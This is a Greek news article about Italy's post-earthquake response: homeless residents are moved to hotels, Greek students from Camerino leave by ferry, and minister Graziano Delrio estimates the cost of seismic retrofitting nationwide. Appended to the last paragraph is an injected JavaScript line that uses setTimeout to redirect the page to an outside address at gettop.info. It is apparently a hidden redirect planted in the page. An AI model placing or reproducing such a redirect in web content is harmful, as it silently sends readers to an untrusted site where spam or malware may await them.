Σε ξενοδοχεία οι άστεγοι από τον σεισμό στην Ιταλία

0
12

 

Με απόφαση του Ιταλού πρωθυπουργού Ματέο Ρέντσι, οι άστεγοι μεταφέρονται σε ξενοδοχεία, διότι, λόγω των αρκετά χαμηλών θερμοκρασιών και τη σταδιακή επιδείνωση των καιρικών συνθηκών, δεν είναι δυνατή η παραμονή τους σε καταυλισμούς με σκηνές, ενώ οι μετασεισμοί συνχίζονταν όλο το βράδυ.

Πολλοί κάτοικοι, όμως, θέλησαν να παραμείνουν κοντά στα σπίτια τους, και να κοιμηθούν μέσα σε αυτοκίνητα, φοβούμενοι ότι δεν πρόκειται να τους επιτραπεί να επιστρέψουν, μέσα σε εύλογο χρονικό διάστημα, στα χωριά και τις κωμοπόλεις τους.

Παράλληλα, έχουν ήδη αναχωρήσει από το λιμάνι της Ανκόνα, με προορισμό την Πάτρα, τριάντα Έλληνες που φοιτούν στο πανεπιστήμιο του Καμερίνο. Πολλοί άλλοι αναμένεται να αναχωρήσουν, πάντα με φέρι μποτ, κατά τη σημερινή ημέρα.

Ο Ιταλός υπουργός Υποδομών, Γκρατσιάνο Ντελρίο, σε δηλώσεις του στην εφημερίδα «Il Messaggero», τόνισε ότι η Ευρώπη θα πρέπει να δείξει ότι κατανοεί την ανάγκη να γίνουν νέες, έκτακτες δαπάνες για την αντιμετώπιση των σεισμών. Ο Ντελρίο επιβεβαιώνει ότι για να μπορέσει να ολοκληρωθεί μια ουσιαστική αντισεισμική θωράκιση όλων των κτιρίων της χώρας, θα απαιτούνταν περίπου τριακόσια πενήντα δισεκατομμύρια ευρώ. «Θα πρέπει όμως να εντοπίσουμε τις κύριες προτεραιότητες, και αυτές, σε μια πρώτη φάση, είναι τα σχολεία, τα νοσοκομεία και τα δημόσια κτήρια», πρόσθεσε ο επικεφαλής του ιταλικού υπουργείου Υποδομών. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here